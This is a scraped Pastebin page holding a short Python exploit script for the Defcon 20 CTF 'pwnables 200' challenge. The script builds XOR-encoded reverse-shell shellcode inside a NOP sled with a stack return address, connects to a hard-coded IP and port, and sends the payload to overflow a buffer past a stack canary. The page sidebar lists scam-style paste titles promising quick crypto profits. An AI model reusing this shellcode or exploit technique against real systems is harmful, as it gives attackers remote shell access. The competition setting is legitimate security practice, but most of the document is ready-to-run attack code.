| CARVIEW |
Select Language
HTTP/2 200
date: Fri, 10 Oct 2025 00:45:25 GMT
content-type: text/html; charset=UTF-8
server: cloudflare
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
vary: accept-encoding
cf-cache-status: DYNAMIC
content-encoding: gzip
set-cookie: _csrf-frontend=d21c29f530cc8e390d4cbd9ad15a18fbac418b0b1b7d3e2d178e2486a745cec6a%3A2%3A%7Bi%3A0%3Bs%3A14%3A%22_csrf-frontend%22%3Bi%3A1%3Bs%3A32%3A%22eDk-z9m5nkv1EevVu-5kV3C4FTlIyk1a%22%3B%7D; HttpOnly; Path=/
cf-ray: 98c21845af95741b-BLR
#!/bin/python# exploit write up - pwnables 200 Defcon 20 CTF# by @_g05u_ N - Pastebin.com
SHARE
TWEET
Untitled
a guest
Jun 3rd, 2012
4,683
0
Never
Add comment
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/python
- # exploit write up - pwnables 200 Defcon 20 CTF
- # by @_g05u_ NULL Life FTW!
- import socket, struct
- #jump to shellcode in stack
- ret = struct.pack("<I", 0xbfbee2ac)
- #reverse shell 6969 https://www.shell-storm.org/shellcode/files/shellcode-676.php
- shellcode = "\x31\xc9\x51\x41\x51\x41\x51\x51\x31\xc0\xb0\x61\xcd\x80\x89\x07\x31\xc9\x88\x4f\x04\xc6\x47\x05\x02\xc7\x47\x08\xbe\xe8\xf5\x09\x66\xc7\x47\x06\x1b\x39\x6a\x10\x8d\x47\x04\x50\x8b\x07\x50\x50\x31\xc0\xb0\x62\xcd\x80\x31\xc9\x51\x8b\x07\x50\x50\x31\xc0\xb0\x5a\xcd\x80\x41\x83\xf9\x03\x75\xef\x31\xc9\x51\x51\x31\xc0\xb0\x17\xcd\x80\xeb\x23\x5b\x89\x1f\x31\xc9\x88\x4b\x07\x89\x4f\x04\x51\x8d\x07\x50\x8b\x07\x50\x50\x31\xc0\xb0\x3b\xcd\x80\x31\xc9\x51\x51\x31\xc0\xb0\x01\xcd\x80\xe8\xd8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x41"
- shellcode = "\x90" * (512 - len(shellcode) - 100) + shellcode + "\x90" * 100
- shellcode = map(lambda x:(ord(x) ^ 0x42), shellcode)
- shell_encoded = ''
- for s in shellcode:
- shell_encoded += chr(s)
- ret = map(lambda x:(ord(x) ^ 0x42), ret)
- ret_encoded = ''
- for s in ret:
- ret_encoded += chr(s)
- s = socket.socket()
- s.connect(("140.197.217.155", 8912))
- s.send("b74b9d86e6cd3480\n")
- print s.recv(1024)
- s.send("4200A642\n") #decoded shellcode with xor 0x42
- print s.recv(1024)
- #bypass canarie number in binary
- s.send(shell_encoded + "\x4D" + ret_encoded)
Advertisement
Add Comment
Please, Sign In to add comment
-
✅⭐ Make huge profits on trading ⭐⭐ H
JavaScript | 3 sec ago | 0.24 KB
-
⭐✅ MAKE $2500 IN 15 MIN⭐⭐⭐ 1
JavaScript | 14 sec ago | 0.24 KB
-
⭐✅ Exploit 2500$ in 15 Minutes⭐⭐⭐ 1
JavaScript | 25 sec ago | 0.24 KB
-
Free Crypto Method (NEVER SEEN BEFORE)⭐⭐ M
JavaScript | 36 sec ago | 0.24 KB
-
⭐✅ Swapzone Glitch ✅ Working⭐⭐⭐ F
JavaScript | 47 sec ago | 0.24 KB
-
✅ Make $2500 in 20 minutes⭐⭐⭐ K
JavaScript | 58 sec ago | 0.24 KB
-
⭐⭐Exchange Exploit⭐⭐ 2
JavaScript | 1 min ago | 0.24 KB
-
✅⭐ Make huge profits on trading ⭐⭐ H
JavaScript | 1 min ago | 0.24 KB
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
